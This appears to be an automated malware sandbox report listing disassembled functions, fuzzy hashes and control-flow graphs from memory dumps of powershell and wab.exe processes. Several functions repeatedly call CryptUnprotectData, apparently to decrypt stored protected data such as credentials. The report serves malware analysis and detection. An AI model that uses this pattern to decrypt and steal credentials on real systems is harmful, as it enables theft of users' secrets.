                                                • Opcode Fuzzy Hash: a2d7eaeb51cb8a352f5ce01a7846f662201b0f5c93bb1d621ed37bfa543a020a
                                                • Instruction Fuzzy Hash: BC216BF230838D6BD7245A6A58007767BB79F96310F28C56AE945CB2C2CA79C980D3E1
                                                Function 078308F0 Relevance: .1, Instructions: 67COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0a724d4f48c3773072b78044a77406f1f0e70a2905ed7431da52300e90b1f7b
                                                • Instruction ID: 3f32316acfa2ad01c0b293487dec246020c8ed229725d60c1033c93d92981eae
                                                • Opcode Fuzzy Hash: b0a724d4f48c3773072b78044a77406f1f0e70a2905ed7431da52300e90b1f7b
                                                • Instruction Fuzzy Hash: 1111E4B1A102199FDB149F7AC8002AEB7A6AFD8610B258065DC19EB340E730DD40DBE0
                                                Function 07837F11 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bffd5550f21f1559d423cb29ee51bc3008597751f2a96b3842964f86f9a5f5c6
                                                • Instruction ID: 4f2da0804b658375e15b60be4b77e5a8888375f062d143603954bfc44789d6ef
                                                • Opcode Fuzzy Hash: bffd5550f21f1559d423cb29ee51bc3008597751f2a96b3842964f86f9a5f5c6
                                                • Instruction Fuzzy Hash: 150147F2B003654BE3211B7C1C51A6967029FC16A6F1000AACA01DF386DA21CC0383D7
                                                Function 078317FB Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

                                                Execution Graph

                                                Execution Coverage:12.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:16.2%
                                                Total number of Nodes:37
                                                Total number of Limit Nodes:3
                                                execution_graph 17609 251e2a8 17610 251e2b4 17609->17610 17615 27787b78 17610->17615 17619 27787b77 17610->17619 17623 27787b69 17610->17623 17611 251e464 17617 27787b8f 17615->17617 17616 27788029 17616->17611 17617->17616 17627 27788431 17617->17627 17621 27787b8f 17619->17621 17620 27788029 17620->17611 17621->17620 17622 27788431 CryptUnprotectData 17621->17622 17622->17621 17625 27787b70 17623->17625 17624 27788029 17624->17611 17625->17624 17626 27788431 CryptUnprotectData 17625->17626 17626->17625 17628 27788440 17627->17628 17632 27788a68 17628->17632 17640 27788a59 17628->17640 17629 277884b0 17629->17617 17633 27788a83 17632->17633 17636 27788b41 17633->17636 17637 27788a68 CryptUnprotectData 17633->17637 17638 27788a59 CryptUnprotectData 17633->17638 17648 27788c4a 17633->17648 17652 277886dc 17636->17652 17637->17636 17638->17636 17641 27788a5c 17640->17641 17644 27788b41 17641->17644 17645 27788a68 CryptUnprotectData 17641->17645 17646 27788a59 CryptUnprotectData 17641->17646 17647 27788c4a CryptUnprotectData 17641->17647 17642 277886dc CryptUnprotectData 17643 27788d0d 17642->17643 17643->17629 17644->17642 17645->17644 17646->17644 17647->17644 17649 27788c5d 17648->17649 17650 277886dc CryptUnprotectData 17649->17650 17651 27788d0d 17650->17651 17651->17636 17653 27788ef8 CryptUnprotectData 17652->17653 17654 27788d0d 17653->17654 17654->17629

                                                Executed Functions

                                                Function 27788EF1 Relevance: 1.6, APIs: 1, Instructions: 57encryptionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 27788ef1-27788ef7 1 27788ef8-27788f6a CryptUnprotectData 0->1 2 27788f6c-27788f72 1->2 3 27788f73-27788f9b 1->3 2->3
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 27788F5D
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID: CryptDataUnprotect
                                                • String ID:
                                                • API String ID: 834300711-0
                                                • Opcode ID: bab35115a5cef3a8bca04fd366b98a2d317ba6573039d2890654aaa67b3dafdd
                                                • Instruction ID: ff2fcf252789bc75255da5b3daf6e4c37e8295f4b93302b299cc7da5e5a500c9
                                                • Opcode Fuzzy Hash: bab35115a5cef3a8bca04fd366b98a2d317ba6573039d2890654aaa67b3dafdd
                                                • Instruction Fuzzy Hash: 77116A76800249DFDB10CF9AC845BDEBFF5EF88320F148419E958A7210C775A951DFA5
                                                Function 277886DC Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 6 277886dc-27788f6a CryptUnprotectData 8 27788f6c-27788f72 6->8 9 27788f73-27788f9b 6->9 8->9
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 27788F5D
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID: CryptDataUnprotect
                                                • String ID:
                                                • API String ID: 834300711-0
                                                • Opcode ID: acb8e551ae4d8a65442358a192c52181df7eb854fb28f18bdb828f4976d339d7
                                                • Instruction ID: 27918b012775043fa21cea8cdfe79f193abe47a6865d154e278b8fbf228bbdac
                                                • Opcode Fuzzy Hash: acb8e551ae4d8a65442358a192c52181df7eb854fb28f18bdb828f4976d339d7
                                                • Instruction Fuzzy Hash: 371129B6800249DFDB10DF9AC845BDEBBF5EF48320F108419E518A7650C379A950DFA5
                                                Function 0251A088 Relevance: .9, Instructions: 890COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d65f2b007223fa08d6366eefbb04a65dc5bb6a5dab0a115919b4072876e86a7
                                                • Instruction ID: 333f2512dc8f1d4d722a89edc819ba841c47f02e76bbda122049e37880baf788
                                                • Opcode Fuzzy Hash: 8d65f2b007223fa08d6366eefbb04a65dc5bb6a5dab0a115919b4072876e86a7
                                                • Instruction Fuzzy Hash: BC82AD70A01209DFEB16CFA8C584AAEBBF2FF88310F158559E8059B3A5D735ED81CB54
                                                Function 025169A0 Relevance: .5, Instructions: 510COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1093 25169a0-25169e6 1094 2516fb1-251700c call 2517118 1093->1094 1095 25169ec-25169fa 1093->1095 1111 251705c-2517060 1094->1111 1112 251700e-2517012 1094->1112 1099 2516a28-2516a39 1095->1099 1100 25169fc-2516a0d 1095->1100 1101 2516a3b-2516a3f 1099->1101 1102 2516aaa-2516abe 1099->1102 1100->1099 1113 2516a0f-2516a1b 1100->1113 1103 2516a41-2516a4d 1101->1103 1104 2516a5a-2516a63 1101->1104 1237 2516ac1 call 25169a0 1102->1237 1238 2516ac1 call 2516fc8 1102->1238 1107 2516a53-2516a55 1103->1107 1108 2516ddb-2516e26 1103->1108 1109 2516a69-2516a6c 1104->1109 1110 2516d6c 1104->1110 1115 2516d62-2516d69 1107->1115 1189 2516e2d-2516eac 1108->1189 1109->1110 1116 2516a72-2516a91 1109->1116 1121 2516d71-2516dd4 1110->1121 1119 2517062-2517071 1111->1119 1120 2517077-251708b 1111->1120 1117 2517021-2517028 1112->1117 1118 2517014-2517019 1112->1118 1113->1121 1122 2516a21-2516a23 1113->1122 1114 2516ac7-2516acd 1123 2516ad6-2516add 1114->1123 1124 2516acf-2516ad1 1114->1124 1116->1110 1155 2516a97-2516a9d 1116->1155 1128 25170fe-2517113 1117->1128 1129 251702e-2517035 1117->1129 1118->1117 1130 2517073-2517075 1119->1130 1131 251709d-25170a7 1119->1131 1132 2517093-251709a 1120->1132 1239 251708d call 2519dd0 1120->1239 1240 251708d call 251a0e8 1120->1240 1241 251708d call 251a088 1120->1241 1121->1108 1122->1115 1125 2516ae3-2516afa 1123->1125 1126 2516bcb-2516bdc 1123->1126 1124->1115 1125->1126 1146 2516b00-2516b0c 1125->1146 1149 2516c06-2516c0c 1126->1149 1150 2516bde-2516beb 1126->1150 1129->1111 1135 2517037-251703b 1129->1135 1130->1132 1136 25170b1-25170b5 1131->1136 1137 25170a9-25170af 1131->1137 1143 251704a-2517051 1135->1143 1144 251703d-2517042 1135->1144 1138 25170b7 1136->1138 1139 25170bd-25170f7 1136->1139 1137->1139 1138->1139 1139->1128 1143->1128 1151 2517057-251705a 1143->1151 1144->1143 1153 2516b12-2516b7e 1146->1153 1154 2516bc4-2516bc6 1146->1154 1157 2516c27-2516c2d 1149->1157 1158 2516c0e-2516c1a 1149->1158 1150->1157 1168 2516bed-2516bf9 1150->1168 1151->1132 1195 2516b80-2516baa 1153->1195 1196 2516bac-2516bc1 1153->1196 1154->1115 1155->1094 1164 2516aa3-2516aa7 1155->1164 1161 2516c33-2516c50 1157->1161 1162 2516d5f 1157->1162 1159 2516c20-2516c22 1158->1159 1160 2516ec3-2516f26 1158->1160 1159->1115 1217 2516f2d-2516fac 1160->1217 1161->1110 1183 2516c56-2516c59 1161->1183 1162->1115 1164->1102 1173 2516eb1-2516ebc 1168->1173 1174 2516bff-2516c01 1168->1174 1173->1160 1174->1115 1183->1094 1186 2516c5f-2516c85 1183->1186 1186->1162 1199 2516c8b-2516c97 1186->1199 1195->1196 1196->1154 1202 2516d5b-2516d5d 1199->1202 1203 2516c9d-2516d15 1199->1203 1202->1115 1218 2516d43-2516d58 1203->1218 1219 2516d17-2516d41 1203->1219 1218->1202 1219->1218 1237->1114 1238->1114 1239->1132 1240->1132 1241->1132
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b2852f93812e97892a057df2df327824e0054c062104cc7bd37151194a2dc08
                                                • Instruction ID: e2e73b5a8b5cd376a4b09f0165a8d0e6b872c98650a387fcfb0a5796b0e6d5a2
                                                • Opcode Fuzzy Hash: 3b2852f93812e97892a057df2df327824e0054c062104cc7bd37151194a2dc08
                                                • Instruction Fuzzy Hash: FC126B70B002199FEB14DF69C854BAEBBB6BF88704F148569E9069B390DF349D41CF94
                                                Function 02517118 Relevance: .4, Instructions: 394COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1389 2517118-251713b 1390 2517146-2517166 1389->1390 1391 251713d-2517143 1389->1391 1394 2517168 1390->1394 1395 251716d-2517174 1390->1395 1391->1390 1396 25174fc-2517505 1394->1396 1397 2517176-2517181 1395->1397 1398 2517187-251719a 1397->1398 1399 251750d-2517519 1397->1399 1402 25171b0-25171cb 1398->1402 1403 251719c-25171aa 1398->1403 1404 251751b-2517521 1399->1404 1405 251756c-251756e 1399->1405 1413 25171cd-25171d3 1402->1413 1414 25171ef-25171f2 1402->1414 1403->1402 1411 2517484-251748b 1403->1411 1406 2517574-2517585 1404->1406 1407 2517523-2517549 1404->1407 1405->1406 1417 2517587-2517589 1406->1417 1418 251758b-251759a 1406->1418 1419 2517552-2517556 1407->1419 1420 251754b-2517550 1407->1420 1411->1396 1423 251748d-251748f 1411->1423 1421 25171d5 1413->1421 1422 25171dc-25171df 1413->1422 1415 25171f8-25171fb 1414->1415 1416 251734c-2517352 1414->1416 1415->1416 1426 2517201-2517207 1415->1426 1424 2517358-251735d 1416->1424 1425 251743e-2517441 1416->1425 1427 25175e9-25175eb 1417->1427 1447 25175e4 1418->1447 1448 251759c-25175ab 1418->1448 1428 251755c-251755d 1419->1428 1420->1428 1421->1416 1421->1422 1421->1425 1429 2517212-2517218 1421->1429 1422->1429 1430 25171e1-25171e4 1422->1430 1431 2517491-2517496 1423->1431 1432 251749e-25174a4 1423->1432 1424->1425 1437 2517447-251744d 1425->1437 1438 2517508 1425->1438 1426->1416 1436 251720d 1426->1436 1440 251721a-251721c 1429->1440 1441 251721e-2517220 1429->1441 1433 25171ea 1430->1433 1434 251727e-2517284 1430->1434 1431->1432 1432->1399 1435 25174a6-25174ab 1432->1435 1433->1425 1434->1425 1444 251728a-2517290 1434->1444 1442 25174f0-25174f3 1435->1442 1443 25174ad-25174b2 1435->1443 1436->1425 1445 2517472-2517476 1437->1445 1446 251744f-2517457 1437->1446 1438->1399 1449 251722a-2517233 1440->1449 1441->1449 1442->1438 1450 25174f5-25174fa 1442->1450 1443->1438 1451 25174b4 1443->1451 1452 2517292-2517294 1444->1452 1453 2517296-2517298 1444->1453 1445->1411 1457 2517478-251747e 1445->1457 1446->1399 1454 251745d-251746c 1446->1454 1447->1427 1448->1447 1464 25175ad-25175b3 1448->1464 1455 2517235-2517240 1449->1455 1456 2517246-251726e 1449->1456 1450->1396 1450->1423 1458 25174bb-25174c0 1451->1458 1459 25172a2-25172b9 1452->1459 1453->1459 1454->1402 1454->1445 1455->1425 1455->1456 1484 2517362-2517398 1456->1484 1485 2517274-2517279 1456->1485 1457->1397 1457->1411 1461 25174e2-25174e4 1458->1461 1462 25174c2-25174c4 1458->1462 1476 25172e4-251730b 1459->1476 1477 25172bb-25172d4 1459->1477 1461->1438 1472 25174e6-25174e9 1461->1472 1467 25174d3-25174d9 1462->1467 1468 25174c6-25174cb 1462->1468 1469 25175b5 1464->1469 1470 25175b7-25175c3 1464->1470 1467->1399 1474 25174db-25174e0 1467->1474 1468->1467 1475 25175c5-25175de 1469->1475 1470->1475 1472->1442 1474->1461 1478 25174b6-25174b9 1474->1478 1475->1447 1490 25175e0-25175e2 1475->1490 1476->1438 1492 2517311-2517314 1476->1492 1477->1484 1489 25172da-25172df 1477->1489 1478->1438 1478->1458 1493 25173a5-25173ad 1484->1493 1494 251739a-251739e 1484->1494 1485->1484 1489->1484 1490->1427 1492->1438 1495 251731a-2517343 1492->1495 1493->1438 1498 25173b3-25173b8 1493->1498 1496 25173a0-25173a3 1494->1496 1497 25173bd-25173c1 1494->1497 1495->1484 1510 2517345-251734a 1495->1510 1496->1493 1496->1497 1499 25173e0-25173e4 1497->1499 1500 25173c3-25173c9 1497->1500 1498->1425 1503 25173e6-25173ec 1499->1503 1504 25173ee-251740d call 25176f1 1499->1504 1500->1499 1502 25173cb-25173d3 1500->1502 1502->1438 1506 25173d9-25173de 1502->1506 1503->1504 1505 2517413-2517417 1503->1505 1504->1505 1505->1425 1508 2517419-2517435 1505->1508 1506->1425 1508->1425 1510->1484
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9fb7529c9c341f67cb6c393aec848c15d876e22454665cc2e1a8c41a8d0e4f30
                                                • Instruction ID: c1b101fc516febd925714d2c18148a1e451c1579cb6d22e9d3d07edc6bfaa729
                                                • Opcode Fuzzy Hash: 9fb7529c9c341f67cb6c393aec848c15d876e22454665cc2e1a8c41a8d0e4f30
                                                • Instruction Fuzzy Hash: 37F10770A101158FEB14CFADC888AADFFB2BF8C314F558469E815AB265DB34EC41CB58
                                                Function 025129EC Relevance: .3, Instructions: 335COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1512 25129ec-25129f6 1514 2512981-2512999 1512->1514 1515 25129f8-2512a3b 1512->1515 1518 25129a0-25129c8 1514->1518 1521 2512a5d-2512aac 1515->1521 1522 2512a3d-2512a5c 1515->1522 1526 2512ac7-2512acf 1521->1526 1527 2512aae-2512ab5 1521->1527 1530 2512ad2-2512ae6 1526->1530 1528 2512ab7-2512abc 1527->1528 1529 2512abe-2512ac5 1527->1529 1528->1530 1529->1530 1533 2512ae8-2512aef 1530->1533 1534 2512afc-2512b04 1530->1534 1535 2512af1-2512af3 1533->1535 1536 2512af5-2512afa 1533->1536 1537 2512b06-2512b0a 1534->1537 1535->1537 1536->1537 1539 2512b6a-2512b6d 1537->1539 1540 2512b0c-2512b21 1537->1540 1541 2512bb5-2512bbb 1539->1541 1542 2512b6f-2512b84 1539->1542 1540->1539 1548 2512b23-2512b26 1540->1548 1543 2512bc1-2512bc3 1541->1543 1544 25136b6 1541->1544 1542->1541 1552 2512b86-2512b8a 1542->1552 1543->1544 1546 2512bc9-2512bce 1543->1546 1549 25136bb-25136f0 1544->1549 1550 2513664-2513668 1546->1550 1551 2512bd4 1546->1551 1553 2512b45-2512b63 call 25102c8 1548->1553 1554 2512b28-2512b2a 1548->1554 1571 25136f2-251371d 1549->1571 1572 251371f-2513881 1549->1572 1556 251366a-251366d 1550->1556 1557 251366f-25136b5 1550->1557 1551->1550 1558 2512b92-2512bb0 call 25102c8 1552->1558 1559 2512b8c-2512b90 1552->1559 1553->1539 1554->1553 1560 2512b2c-2512b2f 1554->1560 1556->1549 1556->1557 1558->1541 1559->1541 1559->1558 1560->1539 1561 2512b31-2512b43 1560->1561 1561->1539 1561->1553 1571->1572
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3ae0b2cfd39b93051039f896592c60d4ac0d1f644a47c8414c60aaf2eb33057
                                                • Instruction ID: 6c2322eaea58d8ba256504c4f0ef758be89726c8191dba14bffc926eb1ba67eb
                                                • Opcode Fuzzy Hash: f3ae0b2cfd39b93051039f896592c60d4ac0d1f644a47c8414c60aaf2eb33057
                                                • Instruction Fuzzy Hash: E8B18C31A043A94FEB158BB888607EFBFB2BFC9214F0846D9D585A7246DB74C907C751
                                                Function 27787B78 Relevance: .3, Instructions: 296COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1576 27787b78-27787b98 1578 27787b9a 1576->1578 1579 27787b9f-27787c61 1576->1579 1578->1579 1584 2778802a-27788128 1579->1584 1585 27787c67-27787cce 1579->1585 1587 2778812a-2778812f 1584->1587 1588 27788130-27788136 1584->1588 1594 27787cd0 1585->1594 1595 27787cd5-27787cde 1585->1595 1587->1588 1594->1595 1596 2778801d-27788023 1595->1596 1597 27788029 1596->1597 1598 27787ce3-27787d7b 1596->1598 1597->1584 1603 27787d81-27787dbd 1598->1603 1604 27787e53-27787eb4 1598->1604 1636 27787dc3 call 277881d0 1603->1636 1637 27787dc3 call 27788431 1603->1637 1615 27787eb5-27787f0a 1604->1615 1611 27787dc9-27787e04 1613 27787e4e-27787e51 1611->1613 1614 27787e06-27787e23 1611->1614 1613->1615 1618 27787e29-27787e4d 1614->1618 1620 27787f10-27788000 1615->1620 1621 27788001-27788013 1615->1621 1618->1613 1620->1621 1622 2778801a 1621->1622 1623 27788015 1621->1623 1622->1596 1623->1622 1636->1611 1637->1611
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f20d64667c8af5e7eb18c776ea5911a675c45bdb87157711853cb4d38d92ae8
                                                • Instruction ID: e99eea76409065a8df3bcedd7c45c4fb70461265bcdf6bd96931d4fb1feeafd8
                                                • Opcode Fuzzy Hash: 4f20d64667c8af5e7eb18c776ea5911a675c45bdb87157711853cb4d38d92ae8
                                                • Instruction Fuzzy Hash: EEE1D174E01218CFEB14DFA5C884B9DBBB2BF89300F2081AAD809A7394DB755E85DF51
                                                Function 2778E148 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1698 2778e148-2778e168 1699 2778e16a 1698->1699 1700 2778e16f-2778e1ca 1698->1700 1699->1700 1701 2778e1d4-2778e205 1700->1701 1704 2778e20b-2778e254 1701->1704 1705 2778e584-2778e5b6 1701->1705 1711 2778e25b-2778e264 1704->1711 1712 2778e256 1704->1712 1713 2778e577-2778e57d 1711->1713 1712->1711 1714 2778e269-2778e33d 1713->1714 1715 2778e583 1713->1715 1723 2778e343-2778e390 call 27789478 call 277881d0 1714->1723 1724 2778e3d7-2778e415 1714->1724 1715->1705 1734 2778e3d2-2778e3d5 1723->1734 1735 2778e392-2778e3d1 call 277894f0 1723->1735 1733 2778e416-2778e56d call 27789448 1724->1733 1757 2778e56f 1733->1757 1758 2778e574 1733->1758 1734->1733 1735->1734 1757->1758 1758->1713
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1ab365e94ba93a764e5af1490bc82899fefd4ac00f8cb4f159b9a465341bd4a
                                                • Instruction ID: 5a0df7a284a110f2a009b2ffdeb3d6e38f69e8fa8e73dcd5b8a6f79248de96c2
                                                • Opcode Fuzzy Hash: e1ab365e94ba93a764e5af1490bc82899fefd4ac00f8cb4f159b9a465341bd4a
                                                • Instruction Fuzzy Hash: C4D1CD74E00218CFDB15CFA5C984B9EBBB2BF89300F1080AAD909AB354DB755E85DF51
                                                Function 27788FB0 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1638 27788fb0-27788fd0 1639 27788fd2 1638->1639 1640 27788fd7-2778906d 1638->1640 1639->1640 1644 277893ef-27789421 1640->1644 1645 27789073-277890bc 1640->1645 1651 277890be 1645->1651 1652 277890c3-277890cc 1645->1652 1651->1652 1653 277893e2-277893e8 1652->1653 1654 277893ee 1653->1654 1655 277890d1-277891a5 1653->1655 1654->1644 1663 277891ab-277891f9 call 277881d0 1655->1663 1664 27789241-2778927f 1655->1664 1673 277891fb-27789223 1663->1673 1674 2778923c-2778923f 1663->1674 1672 27789280-277893d8 1664->1672 1694 277893da 1672->1694 1695 277893df 1672->1695 1696 27789226 call 277894f0 1673->1696 1697 27789226 call 277894e7 1673->1697 1674->1672 1680 2778922c-2778923b 1680->1674 1694->1695 1695->1653 1696->1680 1697->1680
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3557857e3f23b05a7e5b8cc2b1192c6ca6a100bc1f49cc2039fa1068020639c7
                                                • Instruction ID: 6e8c759805f9f9f4b1fce0c2bd9253651d94584c3f5995cdb98a1e85ddd88209
                                                • Opcode Fuzzy Hash: 3557857e3f23b05a7e5b8cc2b1192c6ca6a100bc1f49cc2039fa1068020639c7
                                                • Instruction Fuzzy Hash: 48D1AD74E01218CFEB54DFA5C988B9DBBB2BF89300F1080AAD909AB354DB355E85DF51
                                                Function 02515362 Relevance: .2, Instructions: 193COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 860200a9498bfbe4f5bc5690c0cdcce55bb36d51d9c74fd3749aee5ac0553e56
                                                • Instruction ID: e0bcfffc47ae0ab731b7271a5eed4d923b33b915df158e360cc6e64678879376
                                                • Opcode Fuzzy Hash: 860200a9498bfbe4f5bc5690c0cdcce55bb36d51d9c74fd3749aee5ac0553e56
                                                • Instruction Fuzzy Hash: D791D574E00218CFEB18DFA9C984B9DBBF2BF88300F54806AD409AB365EB349945CF54
                                                Function 0251C19A Relevance: .2, Instructions: 185COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 90a64ac6a23d60132693fcb8f5ef48ef7670259cae3a7e7f4059ca265a367f31
                                                • Instruction ID: bd7a8bca103d15f61a971ba47c3d79fa5e6c04fcb5dae7107a8d0192ae116c8b
                                                • Opcode Fuzzy Hash: 90a64ac6a23d60132693fcb8f5ef48ef7670259cae3a7e7f4059ca265a367f31
                                                • Instruction Fuzzy Hash: 9381C574E40218CFEB18DFAAC984B9DBBF2BF89301F14806AD419AB355DB319941CF55
                                                Function 0251C468 Relevance: .2, Instructions: 185COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dae77bbe49720fec870eaccd3117ba807fa2a19ea1400f1fe360e24581067c04
                                                • Instruction ID: e178bf86dabb01c26ab733f2049b852208f82ba5db697b933d89d21f0aa54c40
                                                • Opcode Fuzzy Hash: dae77bbe49720fec870eaccd3117ba807fa2a19ea1400f1fe360e24581067c04
                                                • Instruction Fuzzy Hash: D281D374E00218CFEB18DFAAC984B9DBBF2BF88301F14906AD419AB365DB319941CF55
                                                Function 0251CA08 Relevance: .2, Instructions: 185COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e46f842cc99753ff091a0a9e8209c3b02f53af0a040f954d3a237f75362d5a9a
                                                • Instruction ID: e1b82efc4996e7ca50a885d2fb1c43fc146cbfc2cfd1c9ed90dc60efaf88b92b
                                                • Opcode Fuzzy Hash: e46f842cc99753ff091a0a9e8209c3b02f53af0a040f954d3a237f75362d5a9a
                                                • Instruction Fuzzy Hash: 7081C474E00218CFEB18DFAAC894A9DBBF2BF88301F14C06AD419AB365DB319941CF55
                                                Function 0251C738 Relevance: .2, Instructions: 184COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24d7625b65d35f639022b05af964b27a232fed3ca7e97abb0b80c8391ad10790
                                                • Instruction ID: 06f8dc393b5549ab4d89424cbb8c115dbcc403feb4b204fe2ea1926c1cc5d79a
                                                • Opcode Fuzzy Hash: 24d7625b65d35f639022b05af964b27a232fed3ca7e97abb0b80c8391ad10790
                                                • Instruction Fuzzy Hash: 6E81C374E00218DFEB18DFAAD984B9DBBF2BF88301F14806AD419AB355DB319841CF55
